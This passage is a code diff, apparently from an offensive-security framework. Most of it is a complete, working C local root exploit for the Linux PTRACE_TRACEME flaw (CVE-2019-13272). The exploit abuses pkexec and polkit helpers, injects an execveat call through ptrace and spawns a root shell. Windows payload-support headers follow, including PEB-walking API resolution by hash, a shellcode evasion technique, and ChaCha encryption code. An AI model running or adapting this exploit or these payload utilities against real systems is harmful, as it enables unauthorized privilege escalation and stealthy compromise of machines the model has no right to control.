+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+};
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  int i;
+  for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+
+  return 0;
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  return force_exec_and_wait(child, 42, "stage3");
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  int warn = 0;
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+  if (stat(pkaction_path, &st) != 0) {
+    dprintf("[-] Could not find pkaction executable at %s\n", pkaction_path);
+    exit(EXIT_FAILURE);
+  }
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[-] Warning: grsec is in use\n");
+    warn++;
+  }
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    warn++;
+  }
+  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    warn++;
+  }
+  if (stat("/usr/sbin/getsebool", &st) == 0) {
+    if (system("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on") == 0) {
+      dprintf("[!] Warning: SELinux deny_ptrace is enabled\n");
+      warn++;
+    }
+  }
+
+  dprintf("[~] Done, looks good\n");
+
+  return warn;
+}
+
+/*
+ * Use pkaction to search PolKit policy actions for viable helper executables.
+ * Check each action for allow_active=yes, extract the associated helper path,
+ * and check the helper path exists.
+ */
+int find_helpers() {
+  char cmd[1024];
+  snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
+  FILE *fp;
+  fp = popen(cmd, "r");
+  if (fp == NULL) {
+    dprintf("[-] Failed to run: %s\n", cmd);
+    exit(EXIT_FAILURE);
+  }
+
+  char line[1024];
+  char buffer[2048];
+  int helper_index = 0;
+  int useful_action = 0;
+  static const char *needle = "org.freedesktop.policykit.exec.path -> ";
+  int needle_length = strlen(needle);
+
+  while (fgets(line, sizeof(line)-1, fp) != NULL) {
+    /* check the action uses allow_active=yes*/
+    if (strstr(line, "implicit active:")) {
+      if (strstr(line, "yes")) {
+        useful_action = 1;
+      }
+      continue;
+    }
+
+    if (useful_action == 0)
+      continue;
+    useful_action = 0;
+
+    /* extract the helper path */
+    int length = strlen(line);
+    char* found = memmem(&line[0], length, needle, needle_length);
+    if (found == NULL)
+      continue;
+
+    memset(buffer, 0, sizeof(buffer));
+    int i;
+    for (i = 0; found[needle_length + i] != '\n'; i++) {
+      if (i >= sizeof(buffer)-1)
+        continue;
+      buffer[i] = found[needle_length + i];
+    }
+
+    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
+      strstr(&buffer[0], "/cpugovctl") != 0 ||
+      strstr(&buffer[0], "/package-system-locked") != 0 ||
+      strstr(&buffer[0], "/cddistupgrader") != 0) {
+      dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
+      continue;
+    }
+
+    /* check the path exists */
+    if (stat(&buffer[0], &st) != 0)
+      continue;
+
+    helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
+    helper_index++;
+
+    if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
+      break;
+  }
+
+  pclose(fp);
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
+
+int ptrace_traceme_root() {
+  dprintf("[.] Using helper: %s\n", helper_path);
+
+  /*
+   * set up a pipe such that the next write to it will block: packet mode,
+   * limited to one packet
+   */
+  SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
+  SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
+  char dummy = 0;
+  SAFE(write(block_pipe[1], &dummy, 1));
+
+  /* spawn pkexec in a child, and continue here once our child is in execve() */
+  dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
+  static char middle_stack[1024*1024];
+  pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
+                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
+  if (!middle_success) return 1;
+
+  /*
+   * wait for our child to go through both execve() calls (first pkexec, then
+   * the executable permitted by polkit policy).
+   */
+  while (1) {
+    int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
+    char buf[16];
+    int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
+    buf[buflen] = '\0';
+    *strchrnul(buf, '\n') = '\0';
+    if (strncmp(buf, basename(helper_path), 15) == 0)
+      break;
+    usleep(100000);
+  }
+
+  /*
+   * our child should have gone through both the privileged execve() and the
+   * following execve() here
+   */
+  dprintf("[.] Tracing midpid ...\n");
+  SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
+  SAFE(waitpid(midpid, &dummy_status, 0));
+  dprintf("[~] Attached to midpid\n");
+
+  force_exec_and_wait(midpid, 0, "stage2");
+  exit(EXIT_SUCCESS);
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "stage2") == 0)
+    return middle_stage2();
+  if (strcmp(argv[0], "stage3") == 0)
+    return spawn_shell();
+
+  dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
+
+  check_env();
+
+  if (argc > 1 && strcmp(argv[1], "check") == 0) {
+    exit(0);
+  }
+
+  /* Search for known helpers defined in 'known_helpers' array */
+  dprintf("[.] Searching for known helpers ...\n");
+  int i;
+  for (i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
+    if (stat(known_helpers[i], &st) == 0) {
+      helper_path = known_helpers[i];
+      dprintf("[~] Found known helper: %s\n", helper_path);
+      ptrace_traceme_root();
+    }
+  }
+
+  /* Search polkit policies for helper executables */
+  dprintf("[.] Searching for useful helpers ...\n");
+  find_helpers();
+  for (i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
+    if (helpers[i] == NULL)
+      break;
+
+    if (stat(helpers[i], &st) == 0) {
+      helper_path = helpers[i];
+      ptrace_traceme_root();
+    }
+  }
+
+  return 0;
+}

data/headers/windows/c_payload_util/chacha.h

@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}

data/headers/windows/c_payload_util/kernel32_util.h

@@ -0,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif

data/headers/windows/c_payload_util/payload_util.h

@@ -0,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif

data/headers/windows/c_payload_util/winsock_util.h

@@ -0,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif

data/logos/haKCers.txt

@@ -0,0 +1,33 @@
